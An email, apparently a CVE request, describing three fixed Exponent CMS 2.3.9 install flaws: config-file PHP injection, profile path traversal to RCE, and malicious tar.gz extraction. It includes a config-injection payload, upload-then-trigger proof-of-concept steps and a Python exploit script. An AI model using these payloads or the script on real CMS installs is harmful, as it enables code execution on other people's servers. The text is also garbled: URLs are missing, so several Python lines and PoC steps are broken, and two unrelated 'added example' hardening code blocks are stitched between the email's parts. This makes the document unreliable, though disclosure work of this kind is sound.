Date: Thu, 22 Sep 2016 21:35:46 +0800
From: Carl Peng <>
Subject: CVE Request - Exponent CMS 2.3.9 multi-vulnerabilities in install code

Hi, I reported the following vulnerabilities in the install code to the
ExponentCMS team some days ago, and they are fixed now.

1. Arbitrary code execution
lines 56 - 63
if (isset($_REQUEST['sc'])) {
    if (file_exists("../framework/conf/config.php")) {
        // Update the config
        foreach ($_REQUEST['sc'] as $key => $value) {
//            $value = expString::sanitize($value);
            expSettings::change($key, $value);
expSettings::change() writes the given key/value pair into the config file
("framework/conf/config.php"), but the user input is not filtered, so
arbitrary content can be written into the config file.

Proof of concept:[SMTP_PORT]=25\\');phpinfo();//
  phpinfo() will then be executed.
Visiting "[SMTP_PORT]=25 " restores the
config afterwards.
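The root cause of issue 1 is that a request value is spliced into PHP source. The following is an added example, not Exponent CMS code: a hypothetical pair of writers, write_setting_unsafe() and write_setting_safe(), that show the quote break-out on a constructed payload modelled on the PoC, and the hardened form that restricts the setting name to a strict pattern and emits the value with var_export() so it can never escape the string literal.

```php
<?php
// Added example (not Exponent CMS code). write_setting_unsafe() and
// write_setting_safe() are hypothetical helpers used only to illustrate
// the config-write problem described in issue 1.

// Unsafe: the value is interpolated into PHP source text, so a value
// containing a quote closes the literal and the remainder becomes code.
function write_setting_unsafe(string $key, string $value): string
{
    return "define('$key', '$value');\n";
}

// Hardened: the key must match a strict allowlist pattern, the value must be
// scalar, and both are emitted with var_export(), which produces a correctly
// escaped PHP literal regardless of quotes or backslashes in the input.
function write_setting_safe(string $key, $value): string
{
    if (!preg_match('/^[A-Z][A-Z0-9_]{0,63}$/', $key)) {
        throw new InvalidArgumentException('invalid setting name');
    }
    if (!is_scalar($value) && $value !== null) {
        throw new InvalidArgumentException('setting value must be scalar');
    }
    return 'define(' . var_export($key, true) . ', '
         . var_export($value, true) . ");\n";
}

// Constructed sample input, modelled on the PoC payload (nowdoc: no escaping).
$payload = <<<'PAYLOAD'
25\\');phpinfo();//
PAYLOAD;

echo "unsafe writer produces:\n", write_setting_unsafe('SMTP_PORT', $payload);
echo "safe writer produces:\n",   write_setting_safe('SMTP_PORT', $payload);

// The key check also rejects names that are not plain constants.
try {
    write_setting_safe("SMTP_PORT', 'x'); phpinfo(); //", '25');
} catch (InvalidArgumentException $e) {
    echo "rejected key: ", $e->getMessage(), "\n";
}
```

Run it with php and compare the two define() lines: in the unsafe output the single quote inside the payload terminates the literal, while var_export() backslash-escapes both the backslashes and the quote so the whole payload stays inside the string.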

2. RCE vulnerability
if (isset($_REQUEST['profile'])) {
    expSettings::activateProfile($_REQUEST['profile']); //here
    expTheme::removeSmartyCache(); //FIXME is this still necessary?
    flash('message', gt("New Configuration Profile Loaded"));
    header('Location: ../index.php');
expSettings::activateProfile() :
copy(BASE . "framework/conf/profiles/$profile.php", BASE . "framework/conf/config.php"); //here
// tag it with the profile name
$fh = fopen(BASE . "framework/conf/config.php", "a");
We can upload a "php" file to the website, then copy it to

Proof of concept:
first, upload a "php" file to the website (via "uploader_paste.php"), such
as /files/test.php,
then visit,
which will copy "/files/test.php" to "framework/conf/config.php".

3. File Upload vulnerability
$files = BASE . "themes/" . DISPLAY_THEME_REAL . "/" . $_REQUEST['install_sample'] . ".tar.gz";
if (!file_exists($files)) {
    $files = BASE . "install/samples/" . $_REQUEST['install_sample'] . ".tar.gz"; //here
if (file_exists($files)) { // only install if there was an archive
    include_once(BASE . 'external/Tar.php');
    $tar = new Archive_Tar($files); //Extract .tar.gz file
    $return = $tar->extract(BASE);
This code extracts a .tar.gz archive, but the "install_sample" parameter
controls the value of "$files", so an uploaded malicious .tar.gz can be
extracted into BASE.

Proof of concept:
first, upload .eql and .tar.gz files (via "uploader_paste.php"), such as
then visit
Successfully extracted file:
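Issues 2 and 3 share one cause: a request parameter ("profile", "install_sample") is used as part of a filesystem path that is then handed to copy() or Archive_Tar. The following is an added example, not Exponent CMS code: a hypothetical resolve_named_file() helper that confines such a name to one directory by validating it as a plain identifier first and then confirming the realpath() result is a regular file under that directory. It goes beyond the two parameters on the page in that the same check applies to any "name + fixed suffix" lookup.

```php
<?php
// Added example (not Exponent CMS code). resolve_named_file() is a
// hypothetical helper illustrating how a user-supplied name can be confined
// to a single directory before any copy() or archive extraction happens.

function resolve_named_file(string $baseDir, string $name, string $suffix): string
{
    // Allow only a short, plain identifier. This rejects "../", slashes,
    // NUL bytes, dots and absolute paths before any filesystem call is made.
    if (!preg_match('/^[A-Za-z0-9][A-Za-z0-9_-]{0,63}$/', $name)) {
        throw new InvalidArgumentException('invalid name');
    }
    $dir = realpath($baseDir);
    if ($dir === false) {
        throw new RuntimeException('base directory does not exist');
    }
    $path = realpath($dir . DIRECTORY_SEPARATOR . $name . $suffix);
    // Defence in depth: even after the pattern check, require that the
    // resolved path is inside the intended directory and is a regular file
    // (so a symlink pointing elsewhere, or a directory, is refused).
    if ($path === false
        || strncmp($path, $dir . DIRECTORY_SEPARATOR, strlen($dir) + 1) !== 0
        || !is_file($path)) {
        throw new RuntimeException('file not found in allowed directory');
    }
    return $path;
}

// Self-contained demonstration using a constructed temporary directory
// standing in for framework/conf/profiles or install/samples.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'exp_profiles_' . getmypid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'default.php', "<?php // sample profile\n");

$candidates = ['default', '../../files/test', 'default.php', "default\0", 'missing'];
foreach ($candidates as $candidate) {
    try {
        echo 'accepted: ', resolve_named_file($base, $candidate, '.php'), "\n";
    } catch (Exception $e) {
        echo 'rejected: ', json_encode($candidate), ' (', $e->getMessage(), ")\n";
    }
}

unlink($base . DIRECTORY_SEPARATOR . 'default.php');
rmdir($base);
```

Only "default" is accepted; the traversal string, the name carrying its own extension, the NUL-embedded name and the nonexistent name are all rejected before copy() or Archive_Tar would ever see them.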

python poc code:
import random
import requests
host = ''

def upload(name, url):
    files = {'upload' : (name, open('evil.tar.gz'))}
    resp =, files=files)
    return resp.content

if 'http://' not in host: host = 'http://{}'.format(host)

host = host.rstrip('/')
url = '{}/framework/modules/file/connector/uploader_paste.php'.format(host)
rstr = random.randint(10,99)

req_eql = upload('{}.eql'.format(rstr), url)
req_tar = upload('{}.tar.gz'.format(rstr), url)

if 'tar.gz' in req_tar:
    req_inc =

evilfile = '{}/3.php'.format(host)
req_ = requests.get(evilfile)

if 'GIF89a' in req_.content:
    print evilfile

And now, all vulnerabilities have been fixed.

These issues were reported by Peng Hua of Inc., and I would
like to request CVEs for these issues (if not already done).

